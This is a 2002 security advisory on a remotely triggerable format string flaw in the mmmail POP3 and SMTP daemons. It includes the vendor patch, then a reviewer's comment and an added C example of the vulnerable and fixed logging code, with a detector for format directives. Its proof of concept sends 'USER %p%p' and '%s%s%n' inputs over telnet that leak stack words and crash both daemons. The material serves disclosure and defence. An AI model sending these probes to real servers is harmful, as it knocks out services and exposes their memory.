-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

________________________________________________________________________

SECURITY ADVISORY                                 INTEXXIA(c) 04 06 2002
ID #1054-040602
________________________________________________________________________

TITLE   : mmmail POP3-SMTP Daemon Format String Vulnerability
CREDITS : Guillaume Pelat / INTEXXIA
________________________________________________________________________

SYSTEM AFFECTED
===============

mmmail <= 0.0.13 (mmpop3d & mmsmtpd)
________________________________________________________________________

DESCRIPTION
===========

"mmmail provides SMTP and POP3 daemons using MySQL, running as a non-root
user. It also supports bandwidth shaping. Relaying is not supported,
although it has been designed to handle many users on many virtual hosts.
It is fast and secure, uses threads, and has been written entirely from
scratch and does not rely on mbox or Maildir formats."

mmmail includes two daemons, mmpop3d and mmsmtpd. Both are vulnerable to
the same remotely exploitable format string issue, because both log client
input through a shared function in mmlib.
________________________________________________________________________

DETAILS
=======

There is a format string vulnerability in the 'mmsyslog()' function used by
the 'mmpop3d' and 'mmsmtpd' programs. This function acts like 'vsyslog()'
if '__GLIBC__' is defined. It formats its arguments into a buffer and then
passes that buffer to 'syslog(3)' as the format string. Because the buffer
carries text supplied by the remote client (the POP3 USER argument, the
SMTP HELO argument), any '%' directive the client sends is interpreted by
syslog(3): '%p' discloses words from the stack, '%s' dereferences them and
'%n' writes through them.

It is not necessary to authenticate to exploit this vulnerability: USER and
HELO are the first commands a client may send.

Successful exploitation of this flaw can allow a remote user to execute
arbitrary code with the privileges of the daemon (a non-root account, per
the description above), i.e. to obtain a local account on the target
machine. At minimum it lets an unauthenticated client crash both daemons,
as the proof of concept below shows.
________________________________________________________________________

PROOF OF CONCEPT
================

mmpop3d
-------

test:~$ telnet test.lab.intexxia.com 110
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
+OK pop3.somehost.net (mmpop3d (mmmail-0.0.13/mmondor)) Service ready
USER %p%p
-ERR Invalid username

In the log file :

mmpop3d[2165]: 3CFC8B53 USER 0x8052f620x80a44fc

(each '%p' printed one word from the daemon's stack: 0x8052f62 and
0x80a44fc, run together because there is no separator between them)

test:~$ telnet test.lab.intexxia.com 110
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
+OK pop3.somehost.net (mmpop3d (mmmail-0.0.13/mmondor)) Service ready
USER %s%s%n
Connection closed by foreign host.

test:~$ telnet test.lab.intexxia.com 110
Trying x.x.x.x...
telnet: Unable to connect to remote host: Connection refused

The daemon has died after interpreting the '%s' and '%n' directives against
whatever happened to be on its stack; the port is no longer listening.

mmsmtpd
-------

test:~$ telnet test.lab.intexxia.com 25
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 smtp.somehost.net (mmsmtpd (mmmail-0.0.13/mmondor)) Service ready
HELO %p%p
501 Invalid hostname

In the log file :

mmsmtpd[2188]: 3CFC8BF9 HELO 0x8052e360x80a447c

test:~$ telnet test.lab.intexxia.com 25
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 smtp.somehost.net (mmsmtpd (mmmail-0.0.13/mmondor)) Service ready
HELO %s%s%n
Connection closed by foreign host.

test:~$ telnet test.lab.intexxia.com 25
Trying x.x.x.x...
telnet: Unable to connect to remote host: Connection refused
________________________________________________________________________

SOLUTION
========

The following patch corrects this issue. It passes the already-formatted
message as an argument to a constant "%s" format instead of using the
message itself as the format :

diff -dru mmmail-0.0.13/mmlib/mmlog.c mmmail-0.0.13.fixed/mmlib/mmlog.c
- --- mmmail-0.0.13/mmlib/mmlog.c	Mon May 13 08:20:13 2002
+++ mmmail-0.0.13.fixed/mmlib/mmlog.c	Tue Jun  4 12:37:19 2002
@@ -70,7 +70,7 @@
 	va_start(lst, fmt);
 	vsnprintf(buf, 1023, fmt, lst);
 	va_end(lst);
- -	syslog(LOG_NOTICE, buf);
+	syslog(LOG_NOTICE, "%s", buf);
 	}
 }

A new version including this patch is available at the following URL :

http://mmondor.gobot.ca/software/linux/mmmail-0.0.14.tar.gz
________________________________________________________________________

VENDOR STATUS
=============

04-06-2002 : This bulletin was sent to Matthew Mondor.
05-06-2002 : Matthew responded quickly and confirmed the vulnerability.
             He released a new version.
________________________________________________________________________

LEGALS
======

mmmail is a registered trademark.

Intexxia provides this information as a public service and "as is".
Intexxia will not be held accountable for any damage or distress caused by
the proper or improper usage of these materials.

(c) intexxia 2002. This document is property of intexxia. Feel free to use
and distribute this material as long as credit is given to intexxia and
the author.
________________________________________________________________________

CONTACT
=======

CERT intexxia                                  cert@intexxia.com
INTEXXIA                                       http://www.intexxia.com
171, av. Georges Clemenceau                    Standard : +33 1 55 69 49 10
92024 Nanterre Cedex - France                  Fax      : +33 1 55 69 78 80

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBPQdDak2N8BNyNDXLEQLHOQCgxlI4n/uFPTw4oZmjUVXTUhV8j7QAoLzr
wM33noZDTKjFJE8HNkSdphPm
=6uvy
-----END PGP SIGNATURE-----
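Review bot: the hunk only fixes the syslog() call, while the DETAILS section says mmsyslog() behaves like vsyslog() when __GLIBC__ is defined; if that build path hands fmt or buf to vsyslog() as its format, it needs the same constant-format treatment (`vsyslog(LOG_NOTICE, "%s", ...)` is not a thing, so it would have to go through the same `syslog(LOG_NOTICE, "%s", buf)` form), and the 0.0.14 package should be re-tested on a glibc host with the `USER %p%p` probe to confirm the log line no longer shows pointers. Minor: `vsnprintf(buf, 1023, fmt, lst);` hard-codes the buffer size; `sizeof(buf)` (or `sizeof(buf) - 1` if the spare byte is intentional) keeps it in step with the declaration.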
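The flaw and the fix side by side, as an added example that is not part of the advisory or of mmmail's own code. It uses a stand-in for syslog(3) that formats into a buffer (so the effect can be inspected offline), the pre-0.0.14 shape of mmsyslog() beside the patched shape, and a small directive counter that flags probes like the USER/HELO arguments in the proof of concept. The inputs are constructed; sink_syslog() and count_format_directives() are hypothetical helpers, not mmmail API.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for syslog(3) (hypothetical helper): formats exactly as syslog
   does, whatever arrives as 'fmt' is interpreted, but writes to a buffer so
   the result can be checked without a log daemon. */
static void sink_syslog(char *out, size_t outlen, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(out, outlen, fmt, ap);
    va_end(ap);
}

/* Shape of mmsyslog() before 0.0.14: the formatted message, which carries the
   client's USER or HELO argument, is handed to the sink as its format string.
   Every '%' directive the client sent is interpreted a second time: "%p"
   prints stack words (the pointers in the log lines above), "%s" dereferences
   them (the crash above), "%n" writes through them (code execution). */
void mmsyslog_vulnerable(char *out, size_t outlen, const char *fmt, ...)
{
    char buf[1024];
    va_list lst;
    va_start(lst, fmt);
    vsnprintf(buf, sizeof buf, fmt, lst);
    va_end(lst);
    sink_syslog(out, outlen, buf);            /* BUG: buf used as format */
}

/* Shape after the 0.0.14 patch: constant format, message as an argument, so
   client-supplied '%' sequences are logged as literal bytes. */
void mmsyslog_fixed(char *out, size_t outlen, const char *fmt, ...)
{
    char buf[1024];
    va_list lst;
    va_start(lst, fmt);
    vsnprintf(buf, sizeof buf, fmt, lst);
    va_end(lst);
    sink_syslog(out, outlen, "%s", buf);      /* client text is data only */
}

/* Detection side (hypothetical helper): count printf conversions in a token a
   client sent. A real POP3 user name or SMTP HELO argument does not contain
   "%p", "%s" or "%n", so a non-zero count on those fields is a cheap signal
   for probes like the ones in the proof of concept. "%%" is a literal percent
   and is not counted. */
int count_format_directives(const char *s)
{
    int n = 0;
    for (; *s != '\0'; s++) {
        const char *p;
        if (*s != '%')
            continue;
        if (s[1] == '%') {                    /* "%%" -> literal '%' */
            s++;
            continue;
        }
        p = s + 1;
        while (*p != '\0' && strchr("-+ #0123456789.*hlLqjzt", *p) != NULL)
            p++;                              /* flags, width, precision, length */
        if (*p != '\0' && strchr("diouxXeEfFgGaAcspn", *p) != NULL) {
            n++;
            s = p;
        }
    }
    return n;
}

int main(void)
{
    char line[256];

    /* Constructed client input "USER 100%%". Only "%%" is sent through the
       vulnerable path because every other directive without a matching
       argument is undefined behaviour; the "%p%p" and "%s%s%n" probes in the
       advisory are exactly that, which is why the daemons died. */
    mmsyslog_vulnerable(line, sizeof line, "%s %s", "USER", "100%%");
    printf("vulnerable: %s\n", line);         /* USER 100%   (directive eaten) */
    mmsyslog_fixed(line, sizeof line, "%s %s", "USER", "100%%");
    printf("fixed:      %s\n", line);         /* USER 100%%  (logged verbatim) */

    /* The probes from the proof of concept, run through the detector. */
    printf("%%p%%p   -> %d directives\n", count_format_directives("%p%p"));
    printf("%%s%%s%%n -> %d directives\n", count_format_directives("%s%s%n"));
    printf("alice  -> %d directives\n", count_format_directives("alice"));
    return 0;
}
```

The vulnerable path shows the symptom in its mildest form: a "%%" the client sent collapses to a single "%" in the log, proving the client text was parsed as a format. The same parsing, fed "%p%p", is what produced the two stack pointers in the advisory's log lines. The fixed path is byte-for-byte what was received, which is the property to check on a patched host.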